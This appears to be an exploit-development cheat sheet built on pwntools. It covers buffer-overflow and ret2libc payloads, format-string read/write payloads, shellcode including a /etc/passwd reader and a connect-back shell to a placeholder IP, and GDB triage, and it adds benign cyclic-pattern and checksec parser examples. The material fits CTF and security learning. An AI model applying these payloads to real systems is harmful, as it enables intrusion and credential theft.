exploit-dev-expert


Exploit Development Expert


Binary Exploitation Basics


Buffer Overflow


```python
from pwn import *

# Find offset
cyclic(200)               # Generate pattern
cyclic_find(0x61616166)   # Find offset

# Basic exploit
offset = 64
ret_addr = p64(0x401234)
payload = b'A' * offset + ret_addr

# With NX bypass (ret2libc)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
system = libc.symbols['system']
bin_sh = next(libc.search(b'/bin/sh'))
```
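How `cyclic()` and `cyclic_find()` actually map a crash value back to an input offset: the example below is added here for illustration and is not pwntools code. It builds the same kind of de Bruijn pattern, in which every n-byte window is unique, so a single faulting register value identifies one position in the input. This is the core of crash triage after a fuzzer or debugger reports a fault. It goes slightly beyond the snippet above by handling a 64-bit register value against a 4-byte pattern (only the first four little-endian bytes are used) and by checking the pattern width. The crash value in `__main__` is constructed.

```python
from itertools import islice
from typing import Iterator, Union

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet: bytes = ALPHABET, n: int = 4) -> Iterator[int]:
    """Lazily yield the de Bruijn sequence B(k, n) over `alphabet`.

    Every n-byte window of the sequence is unique, which is what lets one
    crash value be mapped back to exactly one position in the input.
    Ruskey's recursive construction, generated lazily so only as many bytes
    as the caller consumes are ever produced.
    """
    k = len(alphabet)
    a = [0] * (n + 1)

    def db(t: int, p: int) -> Iterator[int]:
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern (same shape as pwntools' cyclic())."""
    return bytes(islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(subseq: Union[int, bytes], n: int = 4, max_len: int = 1 << 16) -> int:
    """Offset of `subseq` in the pattern, or -1 if not found within `max_len` bytes.

    An int is treated as a value read from a crashed register: it is packed
    little-endian and only its first n bytes (the ones that sat lowest in
    memory) are kept, so a 64-bit value such as 0x6161616161616166 still
    resolves against a 4-byte pattern.
    """
    if isinstance(subseq, int):
        width = max(n, (subseq.bit_length() + 7) // 8)
        subseq = subseq.to_bytes(width, "little")[:n]
    if len(subseq) < n:
        raise ValueError(f"need at least {n} bytes to identify a unique window")
    return cyclic(max_len, n).find(subseq)


if __name__ == "__main__":
    pattern = cyclic(200)
    # Constructed crash value: what a debugger would show in the faulting
    # register after the pattern overwrote it (little-endian bytes of "faaa").
    crashed_with = 0x61616166
    print(f"pattern[:32] = {pattern[:32]!r}")
    print(f"offset of {crashed_with:#x} = {cyclic_find(crashed_with)}")
```

Run it as-is to see the pattern and the recovered offset of 20; `cyclic_find(value, n=8)` selects the 8-byte pattern if that is what was sent.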

Format String


```python
from pwn import *

# Read from stack
payload = b'%x.' * 20
payload = b'%7$s'   # Read specific position

# Write to address
payload = fmtstr_payload(offset, {target_addr: value})
```

Shellcode


```python
from pwn import *

# Using pwntools
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())

# Common shellcodes
shellcraft.sh()                  # /bin/sh
shellcraft.cat('/etc/passwd')
shellcraft.connect('IP', PORT)
```

Pwntools Essentials


```python
from pwn import *

# Setup
context.binary = ELF('./vuln')
context.log_level = 'debug'

# Connection
p = process('./vuln')        # Local
p = remote('ip', port)       # Remote
p = gdb.debug('./vuln')      # With GDB

# I/O
p.sendline(payload)
p.recvuntil(b'>')
data = p.recv(100)

# Interactive
p.interactive()
```

GDB Commands


```bash
gdb ./binary
> checksec                # Security features (pwndbg/GEF command, not plain gdb)
> info functions          # List functions
> disas main              # Disassemble
> b *0x401234             # Breakpoint
> r < payload.txt         # Run with input
> x/20wx $rsp             # Examine stack
```
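What `checksec` reads to report PIE, NX and RELRO: the example below is added here for illustration and is not pwndbg, GEF or pwntools code. It parses the ELF64 header and program headers directly: PIE is `e_type == ET_DYN`, NX is a `PT_GNU_STACK` segment without the execute flag, and RELRO is the presence of a `PT_GNU_RELRO` segment. It handles the edge case of a missing `PT_GNU_STACK` header (reported as NX off, since the x86 loader then falls back to an executable stack) and restricts itself to little-endian ELF64. It does not read the dynamic section, so it reports at most "partial" RELRO and does not detect stack canaries. The two sample images are constructed in `build_elf`; the constant names follow `elf.h`.

```python
import struct
import sys
from typing import Dict, List, Tuple

# Constants from the ELF64 specification (elf.h).
ELF_MAGIC = b"\x7fELF"
ELFCLASS64, ELFDATA2LSB = 2, 1
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_GNU_STACK, PT_GNU_RELRO = 1, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
EHDR_FMT, PHDR_FMT = "<16sHHIQQQIHHHHHH", "<IIQQQQQQ"   # 64 and 56 bytes


def parse_program_headers(data: bytes) -> Tuple[int, List[Tuple[int, int]]]:
    """Return (e_type, [(p_type, p_flags), ...]) from a little-endian ELF64 image."""
    if len(data) < struct.calcsize(EHDR_FMT) or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != ELFCLASS64 or data[5] != ELFDATA2LSB:
        raise ValueError("this example only handles little-endian ELF64")
    fields = struct.unpack(EHDR_FMT, data[:64])
    e_type, e_phoff, e_phentsize, e_phnum = fields[1], fields[5], fields[9], fields[10]
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        phdrs.append((p_type, p_flags))
    return e_type, phdrs


def checksec(data: bytes) -> Dict[str, object]:
    """Report PIE, NX and RELRO from the program headers alone."""
    e_type, phdrs = parse_program_headers(data)
    types = {t for t, _ in phdrs}
    stack_flags = [f for t, f in phdrs if t == PT_GNU_STACK]
    # Without a PT_GNU_STACK header the x86 loader falls back to an executable
    # stack, so a missing header is reported as NX off rather than unknown.
    nx = bool(stack_flags) and not (stack_flags[0] & PF_X)
    return {
        "pie": e_type == ET_DYN,
        "nx": nx,
        # Full RELRO additionally needs DT_BIND_NOW in the dynamic section, which
        # this example does not read, so "partial" is the strongest it reports.
        "relro": "partial" if PT_GNU_RELRO in types else "none",
    }


def build_elf(e_type: int, phdrs: List[Tuple[int, int]]) -> bytes:
    """Constructed sample: a minimal ELF64 image with only a header and program headers."""
    ident = ELF_MAGIC + bytes([ELFCLASS64, ELFDATA2LSB, 1, 0, 0]) + b"\x00" * 7
    ehdr = struct.pack(EHDR_FMT, ident, e_type, 0x3E, 1, 0x1000, 64, 0, 0,
                       64, 56, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack(PHDR_FMT, t, f, 0, 0, 0, 0, 0, 0x1000) for t, f in phdrs)
    return ehdr + body


# Constructed inputs: a hardened PIE with a non-executable stack and RELRO, and a
# weak non-PIE with an RWX stack and no RELRO.
HARDENED = build_elf(ET_DYN, [(PT_LOAD, PF_R | PF_X), (PT_GNU_STACK, PF_R | PF_W),
                              (PT_GNU_RELRO, PF_R)])
WEAK = build_elf(ET_EXEC, [(PT_LOAD, PF_R | PF_W | PF_X), (PT_GNU_STACK, PF_R | PF_W | PF_X)])

if __name__ == "__main__":
    # Pass a real binary path to inspect it; otherwise run on the constructed samples.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], checksec(fh.read()))
    else:
        for name, image in (("hardened", HARDENED), ("weak", WEAK)):
            print(f"{name:9} {checksec(image)}")
```

`readelf -lW ./binary` shows the same `GNU_STACK` and `GNU_RELRO` entries this parser inspects, which is a quick way to cross-check its output on a real file.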